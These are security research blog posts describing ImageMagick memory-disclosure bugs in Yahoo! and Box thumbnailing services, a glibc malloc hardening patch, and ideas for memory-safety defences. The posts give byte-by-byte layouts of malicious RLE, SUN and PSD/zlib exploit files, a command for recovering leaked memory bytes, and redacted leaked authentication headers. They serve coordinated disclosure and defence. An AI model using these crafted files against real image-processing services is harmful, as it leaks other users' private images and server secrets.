Friday, May 19, 2017

*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read


In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.


The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)

    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
        if (q == (Quantum *) NULL)
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
          for (bit=7; bit >= 0; bit--)
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:

59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.


Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;;h=;t=redacted;k=4;s=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.


This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)

Thursday, May 18, 2017

*bleed continues: 18 byte file, $14k bounty, for leaking private Yahoo! Mail images


*bleed attacks are hot right now. Most notably, there's been Heartbleed and Cloudbleed. In both cases, out-of-bounds reads in server side code resulted in private server memory content being returned to clients. This leaked sensitive secrets from the server process' memory space, such as keys, tokens, cookies, etc. There was also a recent client-side bleed in Microsoft's image libraries, exposed through Internet Explorer. One of the reason *bleed attacks are interesting is that they are not affected by most sandboxing, and they are relatively easy to exploit.

Presented here is Yahoobleed #1 (YB1), a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers.

YB1 abuses an 0-day I found in the ImageMagick image processing software. This vulnerability is now a so-called 1-day, because I promptly reported it to upstream ImageMagick and provided a 1-line patch to resolve the issue, which landed here. You can refer to it as CESA-2017-0002.

The previous *bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory. An uninitialized image decode buffer is used as the basis for an image rendered back to the client. This leaks server side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks.

Yahoo! response

The Yahoo! response has been one of best I've seen. In order:
  1. They have a bug bounty program, which encourages and rewards security research and fosters positive hacker relations, etc.
  2. Upon receiveing a bug, they serve a 90-day response deadline on themselves. This is very progressive and the polar opposite of e.g. Microsoft, who occasionally like to turn reasonable disclosure deadlines into a pointless fight.
  3. And indeed the bug was fixed well within 90 days.
  4. The communication was excellent, even when I was sending far too many ping requests.
  5. The fix was particularly thorough: ImageMagick was retired.
  6. A robust bounty of $14,000 was issued (for this combined with a similar issue, to be documented separately). $778 per byte -- lol!
  7. I'm donating this reward to charity. Upon being asked about charitable matching, Yahoo! accepted a suggestion to match (i.e. double) the reward to $28,000.
  8. :sunglasses_like_a_boss:

The attack vector for these demos was to attach the 18-byte exploit file (or a variant) as a Yahoo! Mail attachment, send it to myself, and then click on the image in the received mail to launch the image preview pane. The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content.

The following three images have had entropy stripped from them via a variety of transforms. Originals have been destroyed.

In image #1, you can see the capital letter A inside a black circle. Imagine suddenly and unexpectedly seeing this in a returned image while investigating a vulnerability you expected to be boring! There are various possible reasons for the repeated nature of the recovered image -- assuming the original in-memory image does not consist of a repeated nature.

Most obviously, the in-memory image dimensions probably don't match the dimensions of our uninitialized canvas, 1024x1024 in this particular case. Depending on how the in-memory image is stored, this will lead to repetition and / or offsetting as both seen here.

Also, the in-memory image representation might not match the colorspace, colorspace channel order or alpha channel status (yes or no) of the uninitialized RLE decode canvas. The thumbnail decode and re-encode pipeline will leave all sorts of different in memory artifacts in the course of doing its job.

Don't be in any doubt though: correct reconstruction of the original image would be possible, but that's a non-goal.

In image #2, you might still be able to make out the remains of a human face. Perhaps a forehead, perhaps a nose and even a forehead and cheekbone? Or maybe not, because of the stripping of entropy and transforms applied. But you can appreciate that at the time, seeing a random face was a shock and illustrated the severity of the leak. At that point, I ceased, desisted, destroyed all files based on uninitialized memory and reported the bug.

In image #3, the color has been left in because the image shows interesting vertical bands of magenta, cyan and yellow. What in-memory structure leads to this pattern? I have no idea. At first I was thinking some CMYK colorspace representation but I don't think that makes sense. JPEGs are typically coded in the YCbCr colorspace, so perhaps a partially encoded or decoded JPEG is involved.

The vulnerability

The vulnerability exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format, which previously featured in my blog post noting memory corruption in The new ImageMagick 0-day is in this code snippet here, from coders/rle.c:

    pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
    if ((flags & 0x01) && !(flags & 0x02))
          Set background color.
        for (i=0; i < (ssize_t) number_pixels; i++)
              for (j=0; j < (ssize_t) (number_planes-1); j++)
              *p++=0;  /* initialize matte channel */
      Read runlength-encoded image.
      switch (opcode & 0x3f)
    } while (((opcode & 0x3f) != EOFOp) && (opcode != EOF));

It's a tricky vulnerability to spot because of the abstraction and also because this is a vulnerability caused by the absence of a necessary line of code, not the presence of a buggy line of code. The logic is approximately:
  1. Allocate a suitably sized canvas for the image decode. Note that the GetVirtualMemoryBlob call does NOT guarantee zero-filled memory, as you would expect if it were backed by mmap(). It's just backed by malloc().
  2. Depending on some image header flags, either initialize the canvas to a background color, or don't.
  3. Iterate a loop of RLE protocol commands, which may be long or may be empty.
  4. After this code snippet, the decoded canvas is handed back to the ImageMagick pipeline for whatever processing is underway.
As you can now see, the attacker could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode. Here's an RLE file that accomplishes just that. It's just 18 bytes!

And these 18 bytes parse as follows:

52 CC:       header
00 00 00 00: top, left at 0x0.
00 04 00 04: image dimensions 1024 x 1024
02:          flags 0x02 (no background color)
01:          1 plane (i.e. grayscale image)
08:          8 bits per sample
00 00 00:    no color maps, 0 colormap length, padding
07:          end of image (a protocol command is consumed pre-loop)
07:          end of image (end the decode loop for real)

There are a few bytes that are important for experimentation of exploitation: the number of planes (i.e. a choice between a greyscale vs. a color image), and the image dimensions, which determine the size of the unininitialized malloc() chunk.


Exploitation is an interesting discussion. Here are some of the factors that affect exploitation of this vulnerability, both generally and in the Yahoo! case specifically:
  • Decoder lockdown. Yahoo! did not appear to implement any form of whitelisting for only sane ImageMagick decoders. RLE is not a sane decoder on the modern web. Anyone using ImageMagick really needs to lock down the decoder list to just the ones needed.
  • Sandboxing. As noted above, sandboxing doesn't have much of an effect on this vulnerability type. Although it doesn't make much difference, my best guess is that the server in question might be using Perl and PerlMagick, as well as handling various network traffic, suggesting that a tight sandbox policy is difficult without extensive refactoring.
  • Process isolation. This is critical. *bleed bugs for most usages of ImageMagick are mostly harmless because it's typical to kick off e.g. a thumbnail request by launching the ImageMagick convert binary, once per thumbnail request. This means that the process memory space of the exploited process is only likely to contain the attacker's image data, making exploitation much less interesting (but not irrelevant as we saw in my recent Box and DropBox blog posts).
    The Yahoo! Mail process which is handling thumbnailing has an unusual property, though: it appears to be long lived and to process images from a variety of different users. Suddenly, a memory content leak is a very serious vulnerability.
  • Heap implementation. The heap implementation used is significant. For the input RLE file decomposed above, the canvas allocation is 1024 x 1024 x 4, or 4MB. This is large allocation and for example, the default malloc() tuning on Linux x86_64 leads to such a large allocation being satisfied by mmap(), which zero-fills memory and will not lead to interesting memory content leakage! However, we definitely see leaked heap content with such a large allocation in the Yahoo! context, so a non-default heap setup is clearly in use. With our ability to leak heap content, we could likely fingerprint the exact heap implementation if we cared to do so. Who knows, maybe we'd find tcmalloc or jemalloc, both popular allocators with large service providers.
  • Thumbnail dimensions. It's worth a brief note on thumbnail dimensions. If we're in a situation where our uninitialized canvas gets resized down to a smaller thumbnail, this would compress out detail from the original leaked memory content. This would spoil certain exploitation attempts. However, Yahoo! Mail's preview panel seems to display very large images (tested to 2048x2048) verbatim, so no worries here.
  • Thumbnail compression. This one is interesting. Yahoo! Mail returns thumbnails and image previews as JPEG images. As we know, JPEG compression is lossy. This is not a particular issue if we're only interested in pulling image data out of Yahoo! servers. But if we're interested in looking at raw bytes of Yahoo! server memory, then lossy compression is losing us data.
    As an example of this, I tried to extract concrete pointer values from memory dumps -- perhaps we want to remotely defeat ASLR? I used greyscale images because JPEG compresses color data more than it compresses intensity data. But still, with a 16-byte sized data exfiltration I see pointer values such as 0x020081c5b0be476f and 0x00027c661ac2722a. Hmm. You can see that these may be trying to be Linux x86_64 user space pointers (0x00007f....) but there's a lot of information loss there.
    I think it would be possible to overcome this exfiltration problem. Most likely, there's some thumbnailing endpoint that returns (or can be asked to return with some URL parameter) lossless PNG images, which would do the trick. Or for the brave, mathematical modelling of JPEG compression??


Broadly: in a world of decreasing memory corruption and increasing sandboxing, *bleed bugs provide a compelling option for easily stealing information from servers.

On design: taking a long running process and linking in ImageMagick as a library has to be a discouraged design choice, as it takes bugs that might not be very serious and makes them very serious indeed. Limiting ImageMagick decoders to a minimal required set is a must for any processing of untrusted input.

GraphicsMagick vs. ImageMagick, again. Well, well, look at this :) GraphicsMagick fixed this issue in March 2016, for the v1.3.24 release, tucked away in a changeset titled "Fix SourceForge bug #371 "out-of-bounds read in coders/rle.c:633:39" (see the second memset()). This is another case where tons of vulnerabilities are being found and fixed in both GraphicsMagick and ImageMagick with little co-ordination. This seems like a waste of effort and a risk of 0-day (or is it 1-day?) exposure. It goes both ways: the RLE memory corruption I referenced in my previous blog post was only fixed in GraphicsMagick in March 2016, having been previously fixed in ImageMagick in Dec 2014.

Linux distributions. This vulnerability is now 1-day in the sense that it is broadly unpatched by entities that repackage upstream ImageMagick, such as Linux distributions. (As a side note, it's worth noting that the RLE decoder in Ubuntu 16.04 LTS is totally borked due to a bogus check that can be seen getting removed here.)

But most significantly for this conclusion, I wanted to highlight some questions about ecosystem responsibility.
Researcher responsibility: what is a researcher's responsibility and where does it end? As a researcher who becomes aware of a software risk, I believe I have a responsibility to let the "owner" of that software immediately know about the issue and the fact that I think it's a security risk. Let's assume that the owner makes a fix in a reasonable time. Are we good now? Well, what about all the downstream usages (eventually cascading to end users) that don't yet have the fix? So is it my responsibility to go and find and harangue every cloud provider that is affected? No, probably not. We might let one or two providers with bounty programs know as a positive feedback for encouraging security research, but the broader problem remains.
Upstream vendor responsibility: how should the upstream vendor respond to a security report other than identifying it (if not already clearly flagged) and fixing it promptly? Personally, I think there should be some form of notification in a well defined place (mailing list; web site announcement area; etc.) and the upstream vendor could also take the burden of getting the CVE.
Consumer responsibility: what should consumers such as Yahoo!, Box, DropBox, Ubuntu, etc. do? Well, if the upstream vendor is doing a good job, the consumer security teams can all be subscribed to the same authoritative source and take action whenever a new announcement is made. (Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities.)

Wednesday, May 17, 2017

Further hardening glibc malloc() against single byte overflows


Back in 2014, while at Project Zero, I exploited a buffer overflow of a single NUL byte in glibc. Tavis Ormandy had found the interesting glibc vulnerability but there was skepticism in the Linux community that this was exploitable. The only thing to do was to write an exploit. (Was this really 3 years ago? How time flies!)

As part of warming up to write the exploit, I created a few sample test C files which explored different interesting glibc malloc() side effects after an off-by-one NUL byte write. You can find them here. The exploit abused a situation similar to consolidate_forward.c, but did not thoroughly need to defeat ASLR because the target platform was 32-bit.

I also noted a curiosity for future research in shrink_free_hole_alloc_overlap_consolidate_backward.c: there's a possible sequence triggered by a NUL byte overwrite whereby ASLR can be cleanly defeated to leave aliased heap chunks. The C file is commented if you want to see how the sequence works.

Interestingly enough, this technique turned up in a December 2016 Project Zero guest post describing a Chrome OS exploit chain. In a fantastic piece of work, attributed anonymously, a single byte overflow of the value \x01 is used to fully defeat ASLR and eventually achieve code execution in a 64-bit x86_64 process.

I've been thinking about ways to kill this technique for a while now: it's far too powerful if it can reliably defeat ASLR in a 64-bit process. I also worry that many of the super serious Linux daemon bugs remaining are likely to be of the subtle type, i.e. one byte overflows.

Inline vs. out-of-line metadata

It's time for a brief foray into memory allocator design.

  • glibc malloc. glibc malloc is based on dlmalloc, which has an inline metadata design. Specifically, every buffer handed out to the program is preceded by a little piece of metadata indicating the size of the chunk and whether the previous chunk is free or not.
  • tcmalloc. tcmalloc is an allocator that has a largely out-of-line metadata design, on account of being a bucketing allocator for smaller sizes and a page based allocator for larger sizes. However, the internal metadata for this allocator is mixed in with pages handed out as buffers to the calling program. This was hardened a while ago by Justin Schuh for the Google Chrome web browser; not sure it made it upstream.
  • PartitionAlloc. PartitionAlloc, part of the Google Chrome web browser. It has an out-of-line metadata design such that heap metadata is partitioned or guard paged off from the calling program's buffers. The notable exception, shared with tcmalloc, is freelist pointers, which occupy the freed slots. In PartitionAlloc, freelist pointers are transformed so that dereferencing them faults, and partial pointer overwrites are thwarted.

While writing PartitionAlloc, strictly protected heap metadata was a goal. After all, if the metadata is naturally guarded with guard pages then there's less need for code defenses which are trying to detect and stop bad side effects from metadata corruption. Simplicity wins.

However, there's an interesting interaction with single byte overflows that provides pause for thought and philosophizing.

With an out-of-line metadata design, a single byte overflow off the end of a chunk will hit the first byte of some other chunk. Depending on the different object types that could be in the adjacent chunk, that's potentially a lot of possibilities for the attacker to explore.

With an inline metadata design, a single byte overflow off the end of a chunk will hit some metadata. Depending on the level of metadata corruption checks present, the single byte overflow could be dead in the water as an attacker primitive. However, on the flipside, there's also the possibility for more generic attacks against the metadata, such as the one we are patching up here.

Hardening against the glibc malloc() ASLR defeat

This is one of those cases where a relatively simple patch pops out, but only after some careful thought and analysis.

In this case, the key observation is that there are two linkages between heap chunks in glibc malloc():

  • Freelist pointers. These are doubly linked and the double linkage is already validated. Since pointer values are a "secret" before ASLR is defeated, the attacker cannot fake pointer values before they have defeated ASLR.
  • Lengths. There is also length linkage. For a free chunk, the length is present at both the beginning and the end of the chunk, to enable chunk traversal. Unfortunately, an attacker can craft a fake length easily and problems arise specifically when these lengths are modified to point to valid metadata structures, but not the "correct" metadata structure. Previously there was no length linkage validation.
The solution used was to also validate length linkage when unlinking chunks. It was checked in a while ago, here:;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30

Now, if the attacker has an off-by-one corruption with a small value (NUL or \x01 - \x07) that hits the lowest significant byte of a length (malloc_chunk->size), the attacker can only use that to cause the length to effectively shrink. This is because all heap chunks are at least 8 bytes under the covers. Shrinking a chunk's length means it will never match the prev_size stored at the end of that chunk. Even if the attacker deploys their one byte overflow multiple times, this new check should always catch them.

If an attacker has an arbitrary linear overwrite, they could corrupt both size and prev_size to match, but with that powerful primitive, there would likely be other more fruitful ways forward.


Did we finally nail off-by-one NUL byte overwrites in the glibc heap? Only time will tell!

Monday, May 15, 2017

Are we doing memory corruption mitigations wrong?


Before we get into it, let's start by stating that the progression of memory corruption mitigations over the years has been intensely valuable. The progression of mitigations continues to make exploiting bugs harder and more time consuming. The pool of people who have both the skill and commitment to exploit any given bug (either reliably or at all) is shrinking.

The list of mitigations to credit is long, but includes:

  • Non-executable virtual memory regions.
  • ASLR (address space layout randomization).
  • Stack canaries.
  • Stack variable re-ordering.
  • Heap metadata hardening.
  • Heap partitioning.
  • Control flow integrity (Microsoft CFG, Clang CFI).
  • etc.
The items in the above list have this in common: they target the side effects of memory corruption, as opposed to the memory corruption itself. Some of the side effects targeted are close to the time of the memory corruption, such as a stack canary being checked when a function that caused the corruption returns. Other side effects targeted are potentially very far from the time of the memory corruption, such as control flow integrity on a virtual call, after the attacker has read and written memory arbitrarily.

When targeting side effects of a problem, as opposed to the problem itself, it's often hard to prevent the problem.

I started working on this problem but unfortunately have to put it aside due to other commitments at this time. This blog post documents my thoughts and notes for anyone interested in this problem space.

An alternative?

Should we invest more time in technologies that attempt to stop memory corruption in the first place? I think we should. It's certainly an under researched area.

Let's first clarify that we're talking about defenses for existing C and C++ programs. There are plenty of essays advocating the replacement of C programs with those written in something safer, such as Go. This is a good longer term suggestion but in the shorter term, there's a whole boatload of C legacy that no-one is rushing to move away from.


The main challenge immediately raised when talking about blocking memory corruption at the source is performance. For sure, this is going to be challenging, but here are the tools and situations that may help us:
  • Modern compiler frameworks. A modern compiler framework such as LLVM allows security enhancement transforms to be applied before the optimization passes, so the compiler can lift security checks out of loops, etc.
  • 64-bit processors. Newer processors tend to offer more registers and also "spare" bits in pointer values, both of which may lessen the performance impact of schemes previously tried on 32-bit.
  • New processor instructions. As yet unexplored, but do processor extensions such as Intel MPX offer any paths to thorough yet high performance coverage?
  • Rollback of mitigations. With a C runtime that does not permit buffer bounds to be exceeded, certain mitigations become redundant and can be rolled back. For example, if pointers are bounds checked, there's no urgent need for stack canary checking (which cost a percent or two), because it becomes hard to get the return address corrupted. Likewise for heap metadata hardening and possibly CFI (which also cost a percent or two).
  • Faster heap implementation. Some of the ideas below rely on fast mapping of pointers to heap chunk metadata, such as is done in partitionAlloc() in Chrome. It just so happens that partitionAlloc is faster than almost anything else (including tcmalloc and certainly glibc malloc), so some performance could be clawed back here.
Stricter C / C++ semantics

In the quest for safer compiled C / C++, we might consider placing stricter requirements on the program. For example, while it's already undefined behavior to create certain out-of-bounds pointers, we could compile to a stricter variant of this.

Or, if we decide to dabble in reference counting, it could be mandatory to NULL out all pointer references to a chunk before calling free()

Reserving the top unused bits of 64-bit pointers might also be useful.

Scheme #1: Safe memcpy() with fast pointer lineage checking

This first scheme illustrates how there are some low hanging fruits with a moderate impact and trivial performance overhead. Imagine if memcpy() overflow from one heap chunk to another would be a thing of the past? It fairly trivially can.

Imagine a runtime system where the heap implementation is partitionAlloc(). This heap implementation can take an arbitrary pointer that is part way into an allocation chunk, and reliably and quickly return the chunk size, and the chunk pointer base. So you can have a memcpy() that does this (pseudocode):

void* memcpy(void* dst, const void* src, size_t len) {
  char* dst_base;
  char* dst_extent;
  size_t dst_size;

  partitionAllocGetPtrDetails(&dst_base, &dst_size, dst);
  dst_extent = dst_base + dst_size;
  if (len > dst_extent - dst) {
  /* Add a similar check for src, why not. */

Pretty neat huh? However, there are a lot of challenges and polish to apply before this could be 100% awesome:
  • partitionAlloc() currently couldn't provide a working partitionAllocGetPtrDetails() for arbitrary middle-of-chunk pointers inside allocations greater than about 1MB or so. This would need to be fixed, which might require a rejig of where metadata is stored, to be more ASAN-like.
  • You'd need to stop the compiler thinking it knows all about memcpy() and inlining memcpy() for small fixed size values.
  • This scheme will crash horribly if a stack, BSS or other non-heap pointer value is passed to memcpy(). A generic method of mapping arbitrary pointers to memory metadata needs to be extended to all pointers -- or the checks need to only fire for heap locations.
  • This scheme won't protect for intra-chunk overflows, e.g. if the memcpy() destination is a buffer within a heap allocated struct, and the struct contains sensitive data after the buffer. Perhaps a candidate here for compiler struct re-ordering?
But back to awesomeness, note that memcpy() is just a simple loop that iterates memory so you can imagine adding compiler support to decorate more complicated loops with high performance bounds checks.

Scheme #2: Pointer invalidation with pointer arithmetic checking

We can make the observation that a lot of existing memory checker tools perform checks on every pointer dereference (e.g. ASAN). However, the time when a pointer goes from "good" to "bad" is often when pointer arithmetic is applied to a pointer, such as bumping a pointer along at the end of a loop. 

Given that pointer arithmetic is a little less common that pointer dereference, would it be higher performance to instead do checks when a pointer is incremented to see if it crosses a chunk boundary? As a bonus, this would provide stronger guarantees than the ASAN model because in the ASAN world, e.g. *(ptr + 70) might not fault if that jumps over a redzone.

Scheme #3: Use-after-free detection with pointer cookies

Somewhat specific to 64-bit, but let's take x86-64 and presume that we reserve the upper 16 bits of every pointer value to stamp in a cookie. Then:
  • At malloc() time, a random 16 bit cookie is assigned to the heap chunk and stored as metadata associated with the chunk.
  • The returned pointer has the cookie value as the upper 16 bits.
  • Copying a pointer around, or doing pointer arithmetic, proceeds at full speed and preserves the upper 16 bits.
  • Dereferencing a pointer requires masking off the upper 16 bits and comparing them to the cookie value associated with the referenced heap chunk.
  • As an optimization, the cookie value only needs to be re-checked if free() has been called, or a function is called that might call free(). So tight loops proceed with only the one check up front.
  • When a heap chunk is freed, the cookie value is cleared. The cookie values for existing pointers into the chunk will not match while the chunk is free, and also will not match if the chunk is reallocated.
Scheme #n: Your scheme here

I'm sure there are cleverer people than me out there who can propose better schemes. My point is that we need to try, because there are a ton of little tricks we can pull in this space to make some defenses that are both meaningful and fast.


I really think we can stop memory corruption at the source for some vulnerability classes. There's going to be a performance hit but we can claw some of it back by retiring existing mitigations as they become less relevant.

And is there any reason not to burn a couple years of Moore's law to kill off some memory corruption classes, instead of repeatedly trying to patch up their symptoms?

Thursday, May 11, 2017

[0day] Proving fixed ASLR via ImageMagick uninitialized zlib stream buffer


In my previous post, we explored using an ImageMagick 0day (now a 1day) in the RLE decoder to to determine missing ASLR in both and In response, both Box and DropBox sensibly limited the available decoders. Both dropped RLE support and lots more.

As you may recall from a different but related post, I had challenges working with Box to accurately determine the status of security reports I submitted. In fact, I have neither a confirmation nor denial of the missing ASLR issue on ImageMagick. I've already proven the missing ASLR to my satisfaction in the previous posts -- but is it fixed?

This is a fairly ridiculous length to go to, but: let's prove that Box did fix the ASLR issue, by using another ImageMagick 0day!


Here's a zoomed in sample image from, in response to thumbnailing a greyscale 8x16 variant of an image file that we'll explore below. We're seeing raw memory bytes from a free chunk:

The vulnerability

So when Box went on an ImageMagick decoder removal spree, they obviously had to leave intact the decoders for a few popular formats: JPEG, PNG, etc. One less common decoders left intact was PSD: Adobe Photoshop. This is an understandable product decision. But it's also more attack surface for us to examine. The 0day vulnerability is in the PSD decoder (coders/psd.c):

  compact_pixels=(unsigned char *) AcquireQuantumMemory(compact_size,
  (void) ReadBlob(image,compact_size,compact_pixels);

  stream.next_in=(Bytef *)compact_pixels;
  stream.avail_in=(uInt) compact_size;
  stream.next_out=(Bytef *)pixels;
  stream.avail_out=(uInt) count;

  if (inflateInit(&stream) == Z_OK)

      while (stream.avail_out > 0)
        if ((ret != Z_OK) && (ret != Z_STREAM_END))

The above code snippet is reading in a PSD image color channel from the input file, where it is compressed using ZIP compression. The compact_size variable comes nearly directly from the input file, and it represents the size in bytes of the compressed zip stream. This size is used to allocate a malloc()'ed buffer to hold the compressed data, and the buffer is filled with a read from the input stream. The vulnerability is that there is no return value checking for the ReadBlob() call. This means that if the input file hits an end-of-file condition during the read, the compact_pixels buffer will remain partially or even fully uninitialized.

You can refer to this vulnerability as CESA-2017-0003. It really is an 0day: unreported or unfixed upstream, let alone in Linux distributions or on cloud providers.

The exploit

The previous ImageMagick bugs I've been exploiting have been relatively simple to exploit because raw bytes of memory end up directly in the decoded canvas. With this vulnerability, however, the raw bytes of memory are in a buffer which is to be decoded as a zlib stream. Obviously, many possible sequences of bytes will not be valid zlib streams. And sequences of bytes that are valid zlib streams will likely result in output that is hard (or impossible) to reverse back to the original raw memory bytes. Finally, note that zlib streams are checksummed, and quasi-random bytes in memory are unlikely to have a correct trailing checksum.

Fortunately, a little trick does present us a neat solution. It's useful to have a basic understanding of the zlib format, RFC1950 and the contained deflate stream format, RFC1951. The core of the trick is noting the the deflate stream format is composed blocks, with the block types being:

BTYPE specifies how the data are compressed, as follows:

            00 - no compression
            01 - compressed with fixed Huffman codes
            10 - compressed with dynamic Huffman codes
            11 - reserved (error)

We really don't want to get into reversing the output of Huffman decoding, but "no compression" sounds very intriguing. What if we used a preamble of a zlib header followed by an uncompressed deflate block -- leading in to the bytes of uninitialized memory? We can achieve this by abruptly ending our PSD input file with the this 7 byte sequence:

78 9c: standard zlib header and options
01   : deflate block type 1: no compression
ff ff: length 65535
00 00: length "checksum", which is the negation of the length

Let's say we have an input file which claims a compressed length of 16. The 16 byte compressed data buffer is allocated but filling it results in a short read of 7 bytes (which goes unnoticed and unchecked) with the remaining 9 bytes remaining uninitialized:

